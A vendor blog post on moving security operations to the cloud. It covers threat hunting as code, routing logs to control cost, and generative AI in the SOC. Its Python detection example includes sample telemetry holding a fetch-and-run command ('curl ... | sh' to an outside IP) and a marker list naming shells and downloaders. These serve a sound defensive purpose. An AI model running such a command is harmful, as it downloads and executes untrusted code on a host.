Cybersecurity transformation: Threat detection in the cloud
Retooling, opportunities to control spend, and yes, generative AI
Tony Velleca, CEO CyberProof, a UST company
The dramatic move to public cloud has delivered numerous opportunities to businesses, but at the same time it has created new security threats. The network perimeter no longer marks the defense boundary, and the attack surface grows with every cloud-native service that is added. The threats include infrastructure misconfiguration, unauthorized access to business resources, vulnerable interfaces and APIs, and hijacking of privileged accounts.
Clearly, businesses need to adapt and transform their security operations to cover cloud architectures. And when I say security operations, I specifically mean all the tools and techniques used to detect a potential attack. For example:
- Cloud context: Traditional threat detection tools lack a cloud context. Threat detection and alerting need to be extended to include cloud-native applications, containers, container hosts, Kubernetes environments, and serverless platforms.
- Security policy in Infrastructure as Code: Dev teams are using IaC scripts to rapidly provision resources. Infrastructure as code therefore requires security policy as code: the detection rules, response playbooks, and tool integrations that protect a resource should be versioned and deployed in the same pipeline as the resource itself, rather than configured by hand afterward.
- Cloud-native app security: Security is a shared responsibility between businesses, service providers, and cloud vendors. While cloud vendors provide a solid and secure infrastructure, businesses are responsible for their applications and APIs, which are increasingly targeted. It's important to understand the kinds of risk you're creating when code is being written. Cloud-native application layers create a lot more complexity, and in turn, vulnerability.
Threat hunting as code
The dynamic and ephemeral nature of the cloud (a large portion of containers exist for less than 5 minutes!) poses a real challenge for incident detection and response. By the time an analyst looks at an alert, the workload that generated it may no longer exist, so static detection rules alone are not enough. Comprehensive security operations need real-time monitoring of anomalous behaviors and malicious actions, with correlation that does not depend on the asset still being there to inspect.
This requires aggregating large amounts of log and sensor data from your SIEM, SOAR, and EDR, then processing it efficiently to respond to vulnerabilities and attacks. A security data lake can be very effective for automated threat hunting (what we like to call hunting as code), and there are new tools available that can handle the large amount of data being generated and used for threat detection.
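To make "hunting as code" concrete, here is an added example of a hunt written as a plain function that can be scheduled against a security data lake. It is not CyberProof's code, and the event schema and the constructed sample telemetry below are assumptions for the illustration (loosely modelled on Kubernetes audit events plus a runtime sensor). The hunt correlates on container ID rather than looking the container up live, because a short-lived container is usually gone by the time the hunt runs, and it treats a missing start or stop event as a finding in its own right rather than silently skipping it.

```python
"""Hunting as code: a scheduled hunt over container lifecycle telemetry.

Added illustration, not CyberProof's code. Assumes a flattened event stream
with the fields shown in the constructed sample below.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real data). Timestamps are ISO 8601 UTC.
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:00Z", "type": "container_start", "container": "c-1", "pod": "web-7f9", "image": "nginx:1.25"},
    {"ts": "2024-05-01T10:00:07Z", "type": "exec", "container": "c-1", "pod": "web-7f9",
     "cmd": "/bin/sh -c 'curl -s http://203.0.113.9/x | sh'"},
    {"ts": "2024-05-01T10:00:45Z", "type": "container_stop", "container": "c-1", "pod": "web-7f9"},
    {"ts": "2024-05-01T10:01:00Z", "type": "container_start", "container": "c-2", "pod": "batch-a1", "image": "python:3.12"},
    {"ts": "2024-05-01T10:03:00Z", "type": "container_stop", "container": "c-2", "pod": "batch-a1"},
    {"ts": "2024-05-01T09:00:00Z", "type": "container_start", "container": "c-3", "pod": "db-0", "image": "postgres:16"},
    {"ts": "2024-05-01T09:30:00Z", "type": "exec", "container": "c-3", "pod": "db-0", "cmd": "psql -c 'select 1'"},
    # Start event never arrived (sensor gap): lifecycle is incomplete.
    {"ts": "2024-05-01T10:02:00Z", "type": "exec", "container": "c-4", "pod": "job-zz", "cmd": "/bin/bash"},
]

SHORT_LIVED = timedelta(minutes=5)           # threshold from the "under 5 minutes" observation
SHELL_MARKERS = ("/bin/sh", "/bin/bash", "curl ", "wget ")  # assumed indicators for this hunt


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def hunt_shortlived_exec(events):
    """Return findings for containers that ran a shell/downloader exec and
    lived under SHORT_LIVED, or whose lifecycle is incomplete in the data.

    Correlates purely on container id from the stored events: no live API
    lookup, since the container has typically been destroyed already.
    """
    by_container = defaultdict(lambda: {"start": None, "stop": None, "execs": [], "pod": None})
    for ev in events:
        rec = by_container[ev["container"]]
        rec["pod"] = ev["pod"]
        if ev["type"] == "container_start":
            rec["start"] = parse_ts(ev["ts"])
        elif ev["type"] == "container_stop":
            rec["stop"] = parse_ts(ev["ts"])
        elif ev["type"] == "exec":
            rec["execs"].append(ev["cmd"])

    findings = []
    for cid, rec in by_container.items():
        suspicious = [c for c in rec["execs"] if any(m in c for m in SHELL_MARKERS)]
        if not suspicious:
            continue
        if rec["start"] and rec["stop"]:
            lifetime = rec["stop"] - rec["start"]
            if lifetime >= SHORT_LIVED:
                continue  # long-lived container with a shell exec: a different hunt
            reason = f"lived {int(lifetime.total_seconds())}s"
        else:
            # Missing start or stop is itself worth a look: either the sensor
            # dropped data or the container died before telemetry flushed.
            reason = "incomplete lifecycle (start or stop event missing)"
        findings.append({"container": cid, "pod": rec["pod"], "reason": reason, "cmds": suspicious})
    return findings


if __name__ == "__main__":
    for f in hunt_shortlived_exec(SAMPLE_EVENTS):
        print(f)
```

Because the hunt is a function over stored events, it can live in version control next to the detection rules, be unit-tested against captured samples, and be re-run over historical data when the indicators change.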
Retooling to cloud-native solutions may be difficult for many organizations, but the transition presents a great opportunity for increasing cloud security. Microsoft Sentinel and Google Chronicle are cloud-native SIEMs with analytics and machine learning built in, so ingestion, detection, and investigation happen in one place. When log data is consolidated into a central store, analysts can conduct time series analysis that identifies trends or finds complex relationships and patterns. Wrapping this data with observability tooling provides richer contextual information, resulting in better conclusions and more precise estimations of the problem.
Another advantage of cloud-native security tools is speed and scale. When an attack occurs, you must triage quickly, which means running forensic queries over the relevant data. In legacy environments this often took days because you first had to set up a data warehouse to ingest the logs, then develop your queries, then run them. With cloud-native security tools the data is already ingested and queryable, so the same work takes minutes, significantly increasing the efficiency of security operations.
New tools, new skills
These new environments are almost completely based on code. In the on-prem world people were trained to follow proprietary security rules as they installed new hardware. Now everything is written as code: your infrastructure is code, your detection rules are code, and your playbooks are code. There's a lot of automation capability built in, but it requires detailed analysis about how to restructure your security ops.
This is a hidden challenge that most companies do not fully have their arms around: the change in talent needed for efficient security operations in the cloud. There already isn't enough talent in cybersecurity to go around, and retraining is not a trivial task. We need to take people who have always worked a certain way and have them learn new skills.
Best practices for log data can reduce cloud spend
Clearly, there are tremendous opportunities to improve the job of detecting, responding to, and preventing cyberattacks using cloud-native tools. Surprisingly, this transition also provides the opportunity to reduce cloud costs or at least keep costs the same as when legacy tooling was in place.
Routing lower-value log data directly into your security data lake rather than into your SIEM or EDR, for example, greatly reduces ingestion and storage costs. Traditionally, large volumes of raw, uncompressed data flowed into the SIEM/EDR tool, which charges for every gigabyte ingested on top of storage. Data flowing into a cloud-based SIEM/EDR can be filtered first, so only the events your detection rules actually key on are sent. And since the SIEM/EDR is focused on real-time detection and alerting, data that exists only for regulatory compliance reporting can bypass it entirely and land in the cheaper data lake.
Continuously tuning how data is parsed, aggregated, and filtered based on its context is a vital skill in a cloud-native SOC. To me, this is a new role in the organization. Someone needs to look at cost and optimization constantly, determining which log data is required (or not) in each repository. If you are not doing this, you'll find very quickly that you'll be limited in what you can do with all that log and sensor data, and your costs will go beyond your budget.
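The routing decision described above is easy to express as code at the ingestion edge. The following is an added example, not a feature of any particular SIEM; the event categories, the three tiers, and the constructed sample events are assumptions chosen for the illustration. Everything that is kept lands in the data lake, only detection-relevant events also go to the SIEM, and one failure-mode case is handled explicitly: a compliance-only category (such as object storage access) is normally lake-only, but a failed attempt is kept in the SIEM because repeated access-denied events are exactly the kind of signal a detection rule wants.

```python
"""Log tiering at the ingestion edge: SIEM (priced per GB ingested),
security data lake (cheap storage), or drop.

Added illustration, not vendor code. Categories and sample events are
assumptions for the example.
"""
import json

# Assumed category sets for this example.
DETECTION_RELEVANT = {"console_login", "iam_policy_change", "security_group_change", "assume_role"}
COMPLIANCE_ONLY = {"s3_data_access", "kms_decrypt"}   # retained for audit, not alerted on
DROP = {"health_check"}                               # no detection or compliance value


def route(event):
    """Return the set of destinations for one event, a subset of {"siem", "lake"}."""
    cat = event.get("category")
    if cat in DROP:
        return set()
    dests = {"lake"}                      # everything kept goes to cheap storage
    if cat in DETECTION_RELEVANT:
        dests.add("siem")
    elif cat in COMPLIANCE_ONLY:
        # Successes are lake-only; failures (e.g. AccessDenied bursts) are a
        # detection signal and must still reach the SIEM.
        if event.get("outcome") == "failure":
            dests.add("siem")
    else:
        dests.add("siem")                 # unknown category: fail safe toward detection
    return dests


def tier(events):
    """Route a batch and report bytes that would be billed per destination."""
    stats = {"siem_bytes": 0, "lake_bytes": 0, "dropped": 0, "siem": [], "lake": []}
    for ev in events:
        size = len(json.dumps(ev, separators=(",", ":")).encode())
        dests = route(ev)
        if not dests:
            stats["dropped"] += 1
        if "siem" in dests:
            stats["siem_bytes"] += size
            stats["siem"].append(ev)
        if "lake" in dests:
            stats["lake_bytes"] += size
            stats["lake"].append(ev)
    return stats


# Constructed sample events (not real data).
SAMPLE = [
    {"category": "console_login", "outcome": "failure", "user": "alice", "src": "198.51.100.7"},
    {"category": "s3_data_access", "outcome": "success", "bucket": "reports", "user": "svc-etl"},
    {"category": "s3_data_access", "outcome": "failure", "bucket": "reports", "user": "bob"},
    {"category": "health_check", "path": "/healthz", "status": 200},
    {"category": "iam_policy_change", "user": "bob", "policy": "AdminAccess"},
    {"category": "kms_decrypt", "outcome": "success", "key": "alias/app"},
    {"category": "lambda_invoke", "function": "nightly-report"},   # not classified: fail safe
]

if __name__ == "__main__":
    s = tier(SAMPLE)
    print(f"SIEM: {len(s['siem'])} events / {s['siem_bytes']} bytes; "
          f"lake: {len(s['lake'])} events / {s['lake_bytes']} bytes; dropped: {s['dropped']}")
```

The unknown-category default deliberately errs toward the SIEM; the cost-optimization role described in the text is what moves categories out of that default once their detection value is understood.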
Thoughts on Generative AI for cybersecurity
The SOC is in the day-to-day fight to stay ahead of cybersecurity threats. At CyberProof, we’re an extension of our client's SOC, so we have a direct line of sight into developing trends in the threat landscape. For example, right now we are seeing a dramatic shift in the frequency and sophistication of attacks.
Geopolitical tensions, for example, have given rise to nation-state attacks aimed at stealing information or disrupting infrastructure. We've also seen changes in the market as the result of ChatGPT or generative AI. This technology has armed attackers with the ability to use AI to craft new attacks and rapidly adapt malware to evade detection. Sadly, you can go out on the dark web and find any number of attacks or ‘goods and services’ for sale. Yuval Wollman, President of CyberProof, explains how generative AI is impacting cybersecurity in this article.
On the bright side, AI can be used to help your cyber defense as well. At CyberProof, we are leveraging generative AI to accelerate the development of detection technologies, rules and playbooks, as well as for training purposes. For example, we’ve been running tests that take large sets of log and sensor data and use ChatGPT to give us insights into that information. The results are promising, and we believe there are some great possibilities in using generative AI to make ourselves more agile in developing detection and response strategies.
I realize I have used the word ‘threat’ in this blog more than I’ve used the word ‘opportunity,’ but transforming your SOC for a cloud-native environment does present many opportunities for greater speed and precision in identifying risk despite the increased complexity of the cloud. And yes, you can improve your agility to detect and respond while reducing the overall cost with a well-designed SOC. Our goal is to help our clients accelerate their cloud SOC transformation and architecture strategy to improve threat coverage, all while optimizing cloud spend.
To learn more about how to adapt security operations for the cloud, schedule a complimentary Cloud Security Transformation Workshop with one of our cybersecurity experts.